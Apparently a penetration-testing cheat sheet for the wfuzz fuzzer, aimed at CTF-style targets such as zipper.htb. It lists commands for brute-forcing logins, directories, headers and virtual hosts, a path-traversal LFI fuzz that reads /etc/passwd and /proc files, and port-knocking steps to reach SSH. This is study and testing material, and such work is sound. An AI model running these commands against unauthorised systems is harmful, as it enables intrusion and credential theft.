wfuzz

Web Tool - WFuzz
HackTricks
CheetSheet
Login Form bruteforce
POST, Single list, filter string (hide)
wfuzz -c -w users.txt --hs "Login name" -d "name=FUZZ&password=FUZZ&autologin=1&enter=Sign+in" http://zipper.htb/zabbix/index.php
#Here we have filtered by line
POST, 2 lists, filder code (show)
wfuzz.py -c -z file,users.txt -z file,pass.txt --sc 200 -d "name=FUZZ&password=FUZ2Z&autologin=1&enter=Sign+in" http://zipper.htb/zabbix/index.php
#Here we have filtered by code
GET, 2 lists, filter string (show), proxy, cookies
wfuzz -c -w users.txt -w pass.txt --ss "Welcome " -p 127.0.0.1:8080:HTTP -b "PHPSESSIONID=1234567890abcdef;customcookie=hey" "http://example.com/index.php?username=FUZZ&password=FUZ2Z&action=sign+in"
Bruteforce Dicrectory/RESTful bruteforce
​Arjun parameters wordlist​
wfuzz -c -w /tmp/tmp/params.txt --hc 404 https://domain.com/api/FUZZ
Path Parameters BF
wfuzz -c -w ~/git/Arjun/db/params.txt --hw 11 'http://example.com/path%3BFUZZ=FUZZ'
Header Authentication
Basic, 2 lists, filter string (show), proxy
wfuzz -c -w users.txt -w pass.txt -p 127.0.0.1:8080:HTTP --ss "Welcome" --basic FUZZ:FUZ2Z "http://example.com/index.php"
NTLM, 2 lists, filter string (show), proxy
wfuzz -c -w users.txt -w pass.txt -p 127.0.0.1:8080:HTTP --ss "Welcome" --ntlm 'domain\FUZZ:FUZ2Z' "http://example.com/index.php"
Cookie/Header bruteforce (vhost brute)
Cookie, filter code (show), proxy
wfuzz -c -w users.txt -p 127.0.0.1:8080:HTTP --ss "Welcome " -H "Cookie:id=1312321&user=FUZZ"  "http://example.com/index.php"
User-Agent, filter code (hide), proxy
wfuzz -c -w user-agents.txt -p 127.0.0.1:8080:HTTP --ss "Welcome " -H "User-Agent: FUZZ"  "http://example.com/index.php"
Host
wfuzz -c -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-
top1million-20000.txt --hc 400,404,403 -H "Host: FUZZ.example.com" -u 
http://example.com -t 100
HTTP Verbs (methods) bruteforce
Using file
wfuzz -c -w methods.txt -p 127.0.0.1:8080:HTTP --sc 200 -X FUZZ "http://example.com/index.php"
Using inline list
$ wfuzz -z list,GET-HEAD-POST-TRACE-OPTIONS -X FUZZ http://testphp.vulnweb.com/
Directory & Files Bruteforce
#Filter by whitelisting codes
wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --sc 200,202,204,301,302,307,403 http://example.com/uploads/FUZZ
Tool to bypass Webs
GitHub - carlospolop/fuzzhttpbypass: This tool use fuuzzing to try to bypass unknown authentication methods, who knows...
GitHub
LFI brute force 
wfuzz.py -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -z file,pass.txt http://IP/index.php?FUZZ=../../../../../../../../../../../../../etc/passwd
FUZZ
This should look for LFI vuln. 
Filtering such as word count with --hw or --hc (status code) may be needed 
setting a session cookie may also be needed with -b "PHPSESID=something"
​
files to look.
/var/log/apache2/access.log
​
cd /proc has wonderful info (about what process exists )
try 
/proc/self/cmdline
​
wfuzz -z range,0-100 -u http://IP/manage.php?file=../../../../../../proc/self/fd/FUZZ
-b "SESSIONCOOKIE" may be needed
​
If ssh is filtered, you may try this! 
/proc/sched_debug is useful sometimes. 
if "knockd" exists, it's a port knocking service --> which means some ports may have filters. 
/etc/knockd.conf 
it may look like this. 
In this case, to access SSH, we need to access 7569, 8475,9842 in the correct order. 
access these ports with nc and then try to ssh. 
​

RFI

Manual SQL injection

Last modified 1yr ago